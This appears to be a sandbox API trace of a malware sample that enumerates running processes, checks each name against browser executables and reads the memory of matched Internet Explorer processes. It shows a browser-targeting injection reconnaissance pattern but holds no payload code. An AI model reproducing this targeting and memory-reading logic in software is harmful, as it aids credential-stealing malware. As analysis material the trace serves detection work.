	[0227.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0227.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x614c
	[0227.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.602] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.602] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.603] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.603] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0227.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6150
	[0227.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.604] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0227.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.604] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.605] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0227.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.605] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0227.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0227.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0227.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6154
	[0227.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.607] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0227.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.608] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.609] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0227.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.610] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0227.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6158
	[0227.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.611] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0227.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.612] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.612] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0227.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.612] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.612] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0227.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x615c
	[0227.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.613] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0227.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.614] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.614] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0227.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.614] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0227.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6160
	[0227.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.615] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0227.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.616] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.616] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0227.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.617] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0227.618] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6164
	[0227.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.618] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0227.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.618] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.619] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0227.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.619] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0227.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6168
	[0227.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.634] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0227.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.635] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.635] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0227.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.635] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0227.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x616c
	[0227.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.637] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0227.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.638] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.638] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0227.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.639] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0227.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6170
	[0227.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.640] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0227.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.641] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.641] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0227.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.642] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0227.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6174
	[0227.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.643] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0227.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.643] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.643] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0227.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.644] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0227.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6178
	[0227.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.645] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0227.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.645] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.645] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0227.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.646] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0227.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x617c
	[0227.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.647] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0227.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.647] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.648] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0227.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.648] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0227.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6180
	[0227.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.650] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0227.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.650] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.651] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0227.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.652] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0227.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6184
	[0227.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.653] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0227.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.654] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.654] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0227.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.655] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0227.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6188
	[0227.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.656] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0227.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.657] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.657] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0227.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.658] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0227.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x618c
	[0227.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.660] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0227.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.660] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.661] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0227.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.661] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6190
	[0227.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.662] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.663] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.663] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.663] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.664] NtQueryInformationProcess (in: ProcessHandle=0x6190, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.664] ReadProcessMemory (in: hProcess=0x6190, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.664] ReadProcessMemory (in: hProcess=0x6190, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.664] ReadProcessMemory (in: hProcess=0x6190, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.664] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6194
	[0227.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.665] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.666] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.666] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.666] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.666] NtQueryInformationProcess (in: ProcessHandle=0x6194, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.666] ReadProcessMemory (in: hProcess=0x6194, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.667] ReadProcessMemory (in: hProcess=0x6194, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.667] ReadProcessMemory (in: hProcess=0x6194, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.667] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6198
	[0227.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.668] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.669] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.669] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.669] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0227.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x619c
	[0227.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.670] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0227.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.671] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.671] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0227.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.672] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x61a0
	[0227.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.673] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.674] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
